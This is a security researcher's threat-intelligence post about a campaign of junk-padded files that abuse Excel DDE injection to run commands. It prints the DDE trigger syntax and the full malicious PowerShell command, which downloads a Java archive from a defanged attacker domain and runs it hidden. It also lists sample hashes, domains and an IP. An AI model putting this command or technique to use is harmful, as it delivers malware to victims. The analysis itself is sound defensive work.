More Excel DDE Code Injection
The “DDE code injection” technique is not brand new. DDE stands for “Dynamic Data Exchange”[1]. It has already been discussed by many security researchers[2]. Just a quick reminder for those who missed it. In Excel, it is possible to trigger the execution of an external command by using the following syntax:
=cmd|’arguments’!cell
If some malicious Excel files were spotted recently, I found yesterday a bunch of files all related to the same campaign. The interesting fact is that all those files have a VT score of 0! Indeed, they contain a lot of junk strings and, in the middle of them, a DDE injection:
$ head -10 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98.vir lljecTcCsRfkqsBfL2ud7yg1Eeeb KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D tWgf38B1VjbL2Rp4LXyCuaDbcAk9wuSuA3PLjDmXSmIaTb6ZxEcswmHSTRXo6Fl54NRVLl7onJMgJOnxGWXayUq GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP RsrzZKKq1GjBhFzkzXQhs9i3A5Jvb46HdNyEqpMVJtlljecTcCsRfkqsBfL2ud7yg1EeebNrKZi Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL
By default, Excel will consider any file not recognized as a valid sheet as CSV and will open it as is.
Here is the command executed:
powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"hxxp://topehagepa[.]online\" ,\" %temp%\\WJJWBHVFUG.jar\") }" & %temp%\\WJJWBHVFUG.jar’
I'm using a YARA rule to catch them on VirusTotal and I already found some samples and related domain names.
SHA256 of samples:
002055c485975c5e66f0aa1f30eb9b96bc748285ced1147e7956577cf76180e2 ccc6bc1f52c0caa94626fc1616afcf8ebdc49a03a3dfa280c4395eeb75af144f 9d3b99b0fa2301d36bce4ae14c3df91813ed6583dd0ff7a312a66551771729a3 b8e494d1ca0ecaa36c2c7560dcc6124356aa333bb7db1416c79c1f0081ffc04f 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98 2a0fba56858872b12d58c7d388f641e7f526ef8de814626005b209682c185a99 71ad0ea269cbcf7b170adecbc151286b69fc912b4babd08e87bd38269e21e5a4 ac411a12ab007383829aa30b2584d5865b5762455a952c405495809f78fb084e 90e26612d53425752261a88b21907e29a29ed8bb51847e4bd4cad2b2e399ba50 4eabaac1d528ab5143b3564138c0b5af41dee765a883140bc4797c2f635500a2 9b3064a08ad6729c5280941467de799886e92268a83be2407748bd38338ccb38 1987505b9b7ba75b0972b4152650ca8503de1a2d964df5dc33ec8aa10f71be59 61a9a14f8b50cbc38082ee5068608be7399a14ba84e79d536aec6fdeef54a9b4 7305236f00e95f64282309af810a7ec9a331cb07f5d708e3bf57c15b24e59a37 7d70ba42d1e5f6cdacaaccf11a8fc3166db9d846f1999673aff339163775d673 557c1e7a180708f45e8419a9439568872cacf20399f56345bbe33436b25f6e22
Domain names:
cafogekago[.]online yepeyowora[.]online jekarebege[.]online gelovosaja[.]club topehagepa[.]online nomawesefa[.]club saboverome[.]online vazawoweso[.]online
All the domains resolve to the same IP address: 54.36.212.133 (located at OVH in France) but the server is down at the moment. The downloaded file being a Java archive, there are chances that it's a classic Trojan. Anybody successfully got access to this files? I'd be happy to have a look at it.
[1] https://docs.microsoft.com/en-us/windows/desktop/dataxchg/dynamic-data-exchange
[2] https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments